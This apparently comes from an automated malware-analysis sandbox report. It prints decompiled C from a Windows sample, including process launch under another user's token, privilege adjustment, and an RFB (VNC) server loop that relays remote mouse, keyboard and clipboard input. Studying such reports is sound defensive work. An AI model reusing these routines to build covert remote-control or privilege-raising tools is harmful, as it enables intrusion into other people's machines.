					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E00406F38( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x004087b5
0x004087b8
0x004087be
0x004087c3
0x004087e1
0x004087e3
0x004087e5
0x004087ea
0x004087f8
0x004087f9
0x004087ff
0x00408800
0x00408807
0x00408809
0x00408809
0x0040880e
0x00408812
0x0040881b
0x00408820
0x00408823
0x00408826
0x0040882b
0x0040882d
0x0040882d
0x0040883f
0x0040885c
0x00408867
0x0040886c
0x00408871
0x00408871
0x00408878
0x0040887d
0x0040887d
0x00408878
0x00408883
0x0040888a
0x00408891

APIs

LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 004087B8
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 004087D7
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 004087E3
CreateProcessAsUserW.ADVAPI32(?,00000000,00415A9E,00000000,00000000,00000000,00415A9E,00415A9E,00000000,?,?,?,00000000,00000044), ref: 00408854
CloseHandle.KERNEL32(?), ref: 00408867
CloseHandle.KERNEL32(?), ref: 0040886C
FreeLibrary.KERNEL32(?), ref: 00408883

Strings

DestroyEnvironmentBlock, xrefs: 004087D9
CreateEnvironmentBlock, xrefs: 004087D1
userenv.dll, xrefs: 004087B0

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 0dde27d4e647b15c75867e7dd017799bb16fce25c0aab1c162b9abcb0df8fcd4
Instruction ID: f649f022467870eed5b78bc02d1eb005975c35a69aed4518946f17f1383b2b5a
Opcode Fuzzy Hash: 0dde27d4e647b15c75867e7dd017799bb16fce25c0aab1c162b9abcb0df8fcd4
Instruction Fuzzy Hash: 4B2129B2D0025DABDF10AFE5DD849EEBBBCEB48344B14847AE501B21A0D6389D44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004117CB, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E004117CB(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
				signed int _v8;
				signed int _v13;
				signed short _v15;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v31;
				signed int _v32;
				signed int _v36;
				short _v41;
				short _v43;
				char _v44;
				char _v49;
				char _v52;
				char _v53;
				char _v56;
				char _v60;
				signed int _v64;
				char _v77;
				char _v78;
				unsigned int _v80;
				signed int _v84;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed int _v109;
				char _v112;
				char _v116;
				char _v124;
				char _v380;
				void* __edi;
				void* __esi;
				void* _t205;
				char _t206;
				void* _t208;
				signed char _t212;
				unsigned int _t220;
				signed int _t225;
				signed int _t257;
				signed int _t261;
				signed int _t262;
				void* _t264;
				signed int _t265;
				void* _t274;
				void* _t280;
				signed int _t288;
				signed int _t289;
				void* _t291;
				signed int _t292;
				signed short _t296;
				unsigned int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				intOrPtr _t305;
				signed int _t309;
				void* _t311;
				signed int _t312;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				void* _t321;
				signed int _t322;
				signed int _t329;
				void* _t331;
				signed int _t332;
				signed int _t333;
				signed char _t335;
				void* _t352;
				signed int _t353;
				void* _t355;
				signed int _t356;
				signed int _t366;
				signed int _t375;
				signed int _t382;
				signed int _t389;
				signed int _t390;
				unsigned int _t426;
				signed char _t442;
				signed char _t444;
				signed char _t446;
				signed int _t452;
				signed int _t461;
				void* _t472;
				signed int _t479;
				signed int _t490;
				signed int _t491;
				signed int _t496;
				char _t505;
				intOrPtr _t506;
				signed int _t507;
				signed short _t509;
				intOrPtr* _t517;
				signed int _t525;
				void* _t527;

				_t506 = _a8;
				_t206 = E00409EAF(_t205, _a4, "RFB 003.003\n", 0xc);
				if(_t206 == 0) {
					L107:
					return _t206;
				}
				_push(0x1b7740);
				_push( &_v60);
				_t208 = 0xc;
				_t206 = E00409E38(_t208, _a4);
				if(_t206 == 0) {
					goto L107;
				}
				_push( &_v60);
				_t472 = 4;
				_t206 = E004079E8(_t472, "RFB ", _t472);
				if(_t206 != 0) {
					goto L107;
				}
				_v53 = _t206;
				_v49 = _t206;
				_t212 = E00407504( &_v52, "RFB ", 0);
				_t206 = ((E00407504( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t206 > 0x300) {
					goto L107;
				} else {
					_v24 = _v24 & 0x00000000;
					_v20 = 1;
					 *((intOrPtr*)(_t506 + 4))( &_v24);
					_t220 = _v20;
					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					if(E00409EAF( &_v36, _a4,  &_v36, 4) == 0) {
						_v20 = _v20 | 0xffffffff;
					}
					_t225 = _v20;
					if(_t225 == 0) {
						return E00411765(_t399, __eflags, _a4, _v24);
					}
					_t206 = _t225 - 1;
					if(_t206 != 0) {
						goto L107;
					}
					_t206 = E00409E38(1, _a4,  &_v31, 0x1b7740);
					if(_t206 == 0) {
						goto L107;
					}
					_t206 =  *((intOrPtr*)(_t506 + 8))();
					if(_t206 == 0) {
						goto L107;
					}
					_v36 = _v36 & 0x00000000;
					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
					_t403 = _t206;
					_t541 = _t206;
					if(_t206 == 0) {
						goto L107;
					}
					_t206 = E004115A4( &_v124, _t403,  &_v36, _t541, _a12);
					_t505 = _t206;
					if(_t505 == 0) {
						goto L107;
					}
					_t507 = E004079C2(_v36);
					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
					_t44 = _t505 + 0x20; // 0x20
					E00406EC1( &_v100, _t44, 0x10);
					asm("rol word [ebp-0x5c], 0x8");
					asm("rol word [ebp-0x5a], 0x8");
					asm("rol word [ebp-0x58], 0x8");
					if(E00409EAF( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E00409EAF(_t247, _a4, _v36, _t507) == 0) {
						return E00411732(_t505);
					} else {
						_v41 = 0xffff;
						_v44 = 0;
						_v43 = 0xffff;
						E00406F38( &_v380,  &_v380, 0, 0xff);
						E00406F38( &_v380,  &_v380, 0, 0xff);
						_v8 = 0;
						_v20 = 0;
						goto L16;
						do {
							while(1) {
								L16:
								_t375 = _v8;
								_t509 = 0;
								if(_t375 <= 0) {
									goto L35;
								}
								L17:
								_t274 = E0040A135(0,  &_a4, 0x12c, 0);
								if(_t274 != 0xffffffff) {
									goto L35;
								}
								__imp__#111();
								if(_t274 != 0x274c) {
									L104:
									E00411732(_t505);
									return E00406E85(_v20);
								}
								if(_a16 != 0) {
									WaitForSingleObject(_a16, 0xffffffff);
								}
								 *((intOrPtr*)(_a8 + 0x10))();
								_v28 = _t509;
								if(_t375 <= _t509) {
									L33:
									if(_a16 != _t509) {
										ReleaseMutex(_a16);
									}
									continue;
									do {
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
										L90:
										__eflags =  *(_t505 + 0x1c);
									} while ( *(_t505 + 0x1c) != 0);
									break;
								} else {
									_v24 = _t509;
									_t390 = _t375 * 9;
									do {
										_t527 = _v24 + _v20;
										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
											_push(_t527);
											_push(_a4);
											_t280 = E0041123C(_t505);
											if(_t280 == 0xffffffff || _t280 == 0) {
												__eflags = _a16;
												if(_a16 != 0) {
													ReleaseMutex(_a16);
												}
												goto L104;
											} else {
												if(_t280 == 1) {
													_t283 = _v28 + 1;
													if(_v28 + 1 != _v8) {
														E00406F38(_t283, _t527, 0, 9);
													} else {
														_v8 = _v8 - 1;
														_t390 = _t390 - 9;
														E00406E10(_t390,  &_v20);
													}
												}
												goto L31;
											}
										}
										L31:
										_v28 = _v28 + 1;
										_v24 = _v24 + 9;
									} while (_v28 < _v8);
									_t509 = 0;
									goto L33;
								}
								L35:
								_t376 = _a4;
								_t414 = _a4;
								_t257 = E00409E38(1, _a4,  &_a15, 0x1b7740);
								__eflags = _t257;
								if(_t257 == 0) {
									goto L104;
								}
								_t261 = _a15 & 0x000000ff;
								__eflags = _t261;
								if(_t261 == 0) {
									_t262 = E00409E80(_t414, _t376, 3, 0x1b7740);
									__eflags = _t262;
									if(_t262 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v80);
									_t264 = 0x10;
									_t265 = E00409E38(_t264, _t376);
									__eflags = _t265;
									if(_t265 == 0) {
										goto L104;
									}
									__eflags = _v80 - 0x20;
									if(_v80 == 0x20) {
										L99:
										__eflags = _v77;
										if(_v77 == 0) {
											goto L104;
										}
										asm("rol word [ebp-0x48], 0x8");
										asm("rol word [ebp-0x46], 0x8");
										asm("rol word [ebp-0x44], 0x8");
										__eflags = _v78;
										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
										_t196 = _t505 + 0x31; // 0x31
										_v77 = 1;
										E00406EC1(_t196,  &_v80, 0x10);
										 *(_t505 + 0x41) = _v80 >> 3;
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
									}
									__eflags = _v80 - 0x10;
									if(_v80 == 0x10) {
										goto L99;
									}
									__eflags = _v80 - 8;
									if(_v80 != 8) {
										goto L104;
									}
									goto L99;
								}
								_t288 = _t261;
								__eflags = _t288;
								if(_t288 == 0) {
									_t289 = E00409E80(_t414, _t376, 1, 0x1b7740);
									__eflags = _t289;
									if(_t289 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v32);
									_t291 = 2;
									_t292 = E00409E38(_t291, _t376);
									__eflags = _t292;
									if(_t292 == 0) {
										goto L104;
									}
									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
									 *(_t505 + 0x48) = _t296;
									__eflags = _t296;
									if(_t296 == 0) {
										L89:
										_t297 =  *(_t505 + 0x4c);
										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
										 *(_t505 + 0x50) = _t490;
										__eflags = _t297 - 5;
										if(_t297 != 5) {
											E00406E85( *(_t505 + 0x1c));
											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
										}
										goto L90;
									}
									_t378 = (_t296 & 0x0000ffff) << 2;
									_t161 = _t505 + 0x44; // 0x44
									_t517 = _t161;
									_t301 = E00406E10((_t296 & 0x0000ffff) << 2, _t517);
									__eflags = _t301;
									if(_t301 == 0) {
										goto L104;
									}
									_t303 = E00409E38(_t378, _a4,  *_t517, 0x1b7740);
									__eflags = _t303;
									if(_t303 == 0) {
										goto L104;
									}
									_v28 = _v28 & 0x00000000;
									__eflags = 0 -  *(_t505 + 0x48);
									if(0 >=  *(_t505 + 0x48)) {
										goto L89;
									}
									_t305 =  *_t517;
									do {
										_t491 = _v28 & 0x0000ffff;
										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
										_t305 =  *((intOrPtr*)(_t505 + 0x44));
										_t426 = 5;
										__eflags =  *(_t305 + _t491 * 4) - _t426;
										if( *(_t305 + _t491 * 4) == _t426) {
											 *(_t505 + 0x4c) = _t426;
										}
										_v28 = _v28 + 1;
										__eflags = _v28 -  *(_t505 + 0x48);
									} while (_v28 <  *(_t505 + 0x48));
									goto L89;
								}
								_t309 = _t288 - 1;
								__eflags = _t309;
								if(_t309 == 0) {
									_push(0x1b7740);
									_push( &_v56);
									_t311 = 9;
									_t312 = E00409E38(_t311, _t376);
									__eflags = _t312;
									if(_t312 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0x33], 0x8");
									asm("rol word [ebp-0x31], 0x8");
									asm("rol word [ebp-0x2f], 0x8");
									asm("rol word [ebp-0x2d], 0x8");
									__eflags = _v56;
									_t382 = 0;
									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
									__eflags = _v8;
									if(_v8 <= 0) {
										L76:
										__eflags = _t382 - _v8;
										if(_t382 != _v8) {
											L78:
											E00406EC1(_t382 * 9 + _v20,  &_v56, 9);
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
											goto L35;
										}
										_v8 = _v8 + 1;
										_t316 = E00406E10(_v8 * 9,  &_v20);
										__eflags = _t316;
										if(_t316 == 0) {
											goto L104;
										}
										goto L78;
									}
									_t318 = _v20 + 7;
									__eflags = _t318;
									do {
										__eflags =  *(_t318 - 2);
										if( *(_t318 - 2) != 0) {
											goto L75;
										}
										__eflags =  *_t318;
										if( *_t318 == 0) {
											goto L76;
										}
										L75:
										_t382 = _t382 + 1;
										_t318 = _t318 + 9;
										__eflags = _t382 - _v8;
									} while (_t382 < _v8);
									goto L76;
								}
								_t319 = _t309 - 1;
								__eflags = _t319;
								if(_t319 == 0) {
									_push(0x1b7740);
									_push( &_v112);
									_t321 = 7;
									_t322 = E00409E38(_t321, _t376);
									__eflags = _t322;
									if(_t322 == 0) {
										goto L104;
									}
									__eflags = _v112;
									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
									continue;
								}
								_t329 = _t319 - 1;
								__eflags = _t329;
								if(_t329 == 0) {
									_push(0x1b7740);
									_push( &_v16);
									_t331 = 5;
									_t332 = E00409E38(_t331, _t376);
									__eflags = _t332;
									if(_t332 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0xb], 0x8");
									asm("rol word [ebp-0x9], 0x8");
									_v24 = _v24 & 0x00000000;
									_t525 = 0x8000;
									_t333 = GetSystemMetrics(0x17);
									__eflags = _t333;
									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
									__eflags = _v15 - _v43;
									if(_v15 != _v43) {
										L50:
										_t525 = 0x8001;
										L51:
										_t335 = _v44;
										_t442 = _v16 & 0x00000001;
										__eflags = _t442 - (_t335 & 0x00000001);
										if(_t442 != (_t335 & 0x00000001)) {
											__eflags = _t442;
											if(_t442 == 0) {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
												__eflags = _t461;
											} else {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
											}
											_t525 = _t525 | _t461;
											__eflags = _t525;
										}
										_t444 = _v16 & 0x00000004;
										__eflags = _t444 - (_t335 & 0x00000004);
										if(_t444 != (_t335 & 0x00000004)) {
											__eflags = _t444;
											if(_t444 == 0) {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
												__eflags = _t452;
											} else {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
											}
											_t525 = _t525 | _t452;
											__eflags = _t525;
										}
										_t446 = _v16 & 0x00000002;
										__eflags = _t446 - (_t335 & 0x00000002);
										if(_t446 != (_t335 & 0x00000002)) {
											__eflags = _t446;
											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
											__eflags = _t525;
										}
										__eflags = _v16 & 0x00000008;
										if((_v16 & 0x00000008) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0x78;
										}
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0xffffff88;
										}
										E00406EC1( &_v44,  &_v16, 5);
										_t490 = _t525;
										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
										continue;
									}
									__eflags = _v13 - _v41;
									if(_v13 == _v41) {
										goto L51;
									}
									goto L50;
								}
								__eflags = _t329 != 1;
								if(_t329 != 1) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v116);
								_t352 = 3;
								_t353 = E00409E38(_t352, _t376);
								__eflags = _t353;
								if(_t353 == 0) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v64);
								_t355 = 4;
								_t356 = E00409E38(_t355, _t376);
								__eflags = _t356;
								if(_t356 == 0) {
									goto L104;
								}
								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
								_t389 = E00406E55(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
								__eflags = _t389;
								if(_t389 == 0) {
									E00406E85(0);
									goto L104;
								}
								_t366 = E00409E38(_v64, _a4, _t389, 0x1b7740);
								__eflags = _t366;
								if(_t366 == 0) {
									goto L104;
								}
								_t490 = _v64;
								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
								E00406E85(_t389);
							}
							_t300 = E00406E55(0x400);
							 *(_t505 + 0x1c) = _t300;
							__eflags = _t300;
						} while (_t300 != 0);
						goto L104;
					}
				}
			}

0x004117d6
0x004117e4
0x004117eb
0x00411fb6
0x00411fb6
0x00411fb6
0x004117f4
0x004117fc
0x004117ff
0x00411800
0x00411807
0x00000000
0x00000000
0x00411810
0x00411813
0x0041181b
0x00411822
0x00000000
0x00000000
0x00411828
0x0041182b
0x00411833
0x00411850
0x0041185d
0x00000000
0x00411863
0x00411865
0x00411871
0x00411874
0x00411877
0x0041189f
0x004118a6
0x004118a8
0x004118b2
0x004118b4
0x004118b4
0x004118bb
0x004118be
0x00000000
0x00411fad
0x004118c4
0x004118c5
0x00000000
0x00000000
0x004118d9
0x004118e0
0x00000000
0x00000000
0x004118ef
0x004118f4
0x00000000
0x00000000
0x004118fc
0x00411907
0x0041190a
0x0041190c
0x0041190e
0x00000000
0x00000000
0x0041191a
0x0041191f
0x00411923
0x00000000
0x00000000
0x00411935
0x00411942
0x00411955
0x0041197a
0x0041197f
0x00411987
0x0041198c
0x00411991
0x00411996
0x004119ab
0x00000000
0x004119cb
0x004119d8
0x004119e4
0x004119e7
0x004119eb
0x004119f9
0x004119fe
0x00411a01
0x00411a01
0x00411a04
0x00411a04
0x00411a04
0x00411a04
0x00411a07
0x00411a0b
0x00000000
0x00000000
0x00411a11
0x00411a1d
0x00411a25
0x00000000
0x00000000
0x00411a2b
0x00411a36
0x00411f8d
0x00411f8f
0x00000000
0x00411f97
0x00411a3f
0x00411a46
0x00411a46
0x00411a51
0x00411a54
0x00411a59
0x00411acc
0x00411acf
0x00411ad8
0x00411ad8
0x00000000
0x00411a04
0x00411a04
0x00411a04
0x00411a04
0x00411a07
0x00411a0b
0x00000000
0x00000000
0x00000000
0x00411a0b
0x00411ece
0x00411ece
0x00411ece
0x00000000
0x00411a5b
0x00411a5b
0x00411a5e
0x00411a61
0x00411a64
0x00411a6c
0x00411a75
0x00411a76
0x00411a7b
0x00411a83
0x00411f75
0x00411f79
0x00411f7e
0x00411f7e
0x00000000
0x00411a91
0x00411a94
0x00411a99
0x00411a9d
0x00411ab6
0x00411a9f
0x00411a9f
0x00411aa2
0x00411aaa
0x00411aaa
0x00411a9d
0x00000000
0x00411a94
0x00411a83
0x00411abb
0x00411abb
0x00411ac1
0x00411ac5
0x00411aca
0x00000000
0x00411aca
0x00411ae3
0x00411ae3
0x00411af3
0x00411af5
0x00411afa
0x00411afc
0x00000000
0x00000000
0x00411b06
0x00411b06
0x00411b09
0x00411f07
0x00411f0c
0x00411f0e
0x00000000
0x00000000
0x00411f10
0x00411f14
0x00411f17
0x00411f1a
0x00411f1f
0x00411f21
0x00000000
0x00000000
0x00411f23
0x00411f27
0x00411f35
0x00411f35
0x00411f39
0x00000000
0x00000000
0x00411f3b
0x00411f40
0x00411f45
0x00411f4a
0x00411f53
0x00411f5a
0x00411f5e
0x00411f62
0x00411f6d
0x00411a04
0x00411a04
0x00411a04
0x00411a07
0x00411a0b
0x00000000
0x00000000
0x00000000
0x00411a0b
0x00411a04
0x00411f29
0x00411f2d
0x00000000
0x00000000
0x00411f2f
0x00411f33
0x00000000
0x00000000
0x00000000
0x00411f33
0x00411b10
0x00411b10
0x00411b11
0x00411dd2
0x00411dd7
0x00411dd9
0x00000000
0x00000000
0x00411ddf
0x00411de3
0x00411de6
0x00411de9
0x00411dee
0x00411df0
0x00000000
0x00000000
0x00411dfa
0x00411e0b
0x00411e0d
0x00411e11
0x00411e14
0x00411ea1
0x00411ea1
0x00411ec4
0x00411ec6
0x00411ec9
0x00411ecc
0x00411ef5
0x00411efa
0x00411a04
0x00411a04
0x00411a04
0x00411a07
0x00411a0b
0x00000000
0x00000000
0x00000000
0x00411a0b
0x00411a04
0x00000000
0x00411ecc
0x00411e1d
0x00411e20
0x00411e20
0x00411e25
0x00411e2a
0x00411e2c
0x00000000
0x00000000
0x00411e3e
0x00411e43
0x00411e45
0x00000000
0x00000000
0x00411e4b
0x00411e51
0x00411e55
0x00000000
0x00000000
0x00411e57
0x00411e59
0x00411e59
0x00411e84
0x00411e86
0x00411e8b
0x00411e8c
0x00411e8f
0x00411e91
0x00411e91
0x00411e94
0x00411e9b
0x00411e9b
0x00000000
0x00411e59
0x00411b17
0x00411b17
0x00411b18
0x00411d41
0x00411d45
0x00411d48
0x00411d4b
0x00411d50
0x00411d52
0x00000000
0x00000000
0x00411d58
0x00411d5d
0x00411d62
0x00411d67
0x00411d6c
0x00411d75
0x00411d77
0x00411d7a
0x00411d7d
0x00411d99
0x00411d99
0x00411d9c
0x00411db7
0x00411dc4
0x00411a04
0x00411a04
0x00411a04
0x00411a07
0x00411a0b
0x00000000
0x00000000
0x00000000
0x00411a0b
0x00000000
0x00411a04
0x00411d9e
0x00411daa
0x00411daf
0x00411db1
0x00000000
0x00000000
0x00000000
0x00411db1
0x00411d82
0x00411d82
0x00411d85
0x00411d85
0x00411d89
0x00000000
0x00000000
0x00411d8b
0x00411d8e
0x00000000
0x00000000
0x00411d90
0x00411d90
0x00411d91
0x00411d94
0x00411d94
0x00000000
0x00411d85
0x00411b1e
0x00411b1e
0x00411b1f
0x00411cec
0x00411cf0
0x00411cf3
0x00411cf6
0x00411cfb
0x00411cfd
0x00000000
0x00000000
0x00411d03
0x00411d35
0x00411d39
0x00000000
0x00411d39
0x00411b25
0x00411b25
0x00411b26
0x00411bc6
0x00411bca
0x00411bcd
0x00411bd0
0x00411bd5
0x00411bd7
0x00000000
0x00000000
0x00411bdd
0x00411be2
0x00411be7
0x00411bed
0x00411bf2
0x00411bf8
0x00411bfe
0x00411c01
0x00411c05
0x00411c11
0x00411c11
0x00411c16
0x00411c16
0x00411c1e
0x00411c24
0x00411c26
0x00411c28
0x00411c2a
0x00411c3e
0x00411c47
0x00411c47
0x00411c2c
0x00411c2e
0x00411c37
0x00411c37
0x00411c4a
0x00411c4a
0x00411c4a
0x00411c51
0x00411c57
0x00411c59
0x00411c5b
0x00411c5d
0x00411c71
0x00411c7a
0x00411c7a
0x00411c5f
0x00411c61
0x00411c6a
0x00411c6a
0x00411c7d
0x00411c7d
0x00411c7d
0x00411c82
0x00411c87
0x00411c89
0x00411c8d
0x00411c99
0x00411c99
0x00411c99
0x00411c9b
0x00411c9f
0x00411ca1
0x00411ca1
0x00411ca7
0x00411ca7
0x00411cae
0x00411cb2
0x00411cb4
0x00411cb4
0x00411cba
0x00411cba
0x00411ccb
0x00411cd7
0x00411ce4
0x00000000
0x00411ce4
0x00411c0b
0x00411c0f
0x00000000
0x00000000
0x00000000
0x00411c0f
0x00411b2c
0x00411b2d
0x00000000
0x00000000
0x00411b33
0x00411b37
0x00411b3a
0x00411b3d
0x00411b42
0x00411b44
0x00000000
0x00000000
0x00411b4a
0x00411b4e
0x00411b51
0x00411b54
0x00411b59
0x00411b5b
0x00000000
0x00000000
0x00411b87
0x00411b90
0x00411b92
0x00411b94
0x00411f88
0x00000000
0x00411f88
0x00411ba2
0x00411ba7
0x00411ba9
0x00000000
0x00000000
0x00411bb2
0x00411bb8
0x00411bbc
0x00411bbc
0x00411edd
0x00411ee2
0x00411ee5
0x00411ee5
0x00000000
0x00411eed
0x004119ab

APIs

Part of subcall function 00409EAF: send.WS2_32(?,?,?,00000000), ref: 00409EBD

WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,?,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 00411A2B
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 00411A46
ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 00411AD8
GetSystemMetrics.USER32 ref: 00411BF2

Part of subcall function 00409E38: recv.WS2_32(?,?,00000004,00000000), ref: 00409E5C

ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 00411F7E

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Strings

RFB 003.003, xrefs: 004117DC
RFB , xrefs: 00411816
x, xrefs: 00411CA7
, xrefs: 00411F23

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
String ID: $RFB $RFB 003.003$x
API String ID: 3911805420-914445781
Opcode ID: d2328708ad89c7747a7f0abc200d39da62e7f982d043513018a6762b3e87302c
Instruction ID: 803ec769d782a3ef37712938257643b9df2ed94de05b297d610e2456140eddce
Opcode Fuzzy Hash: d2328708ad89c7747a7f0abc200d39da62e7f982d043513018a6762b3e87302c
Instruction Fuzzy Hash: 9F32E231A00219AADF24DFA4C845BFEBBB5EF44344F04412BEA55A72D2DB389D85C798

Uniqueness

Uniqueness Score: -1.00%

Function 00408551, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408551(char _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t1 =  &_v12; // 0x415b4a
				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0, _t1) != 0) {
					L3:
					_t4 =  &_a4; // 0x415b4a
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23,  *_t4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				}
				_t2 =  &_v12; // 0x415b4a
				if(OpenProcessToken(0xffffffff, 0x20, _t2) != 0) {
					goto L3;
				}
				return 0;
			}

0x00408558
0x0040855c
0x00408570
0x00408588
0x0040858c
0x0040858f
0x00408597
0x004085a6
0x004085c7
0x004085c7
0x004085cc
0x00000000
0x004085d2
0x00408572
0x00408582
0x00000000
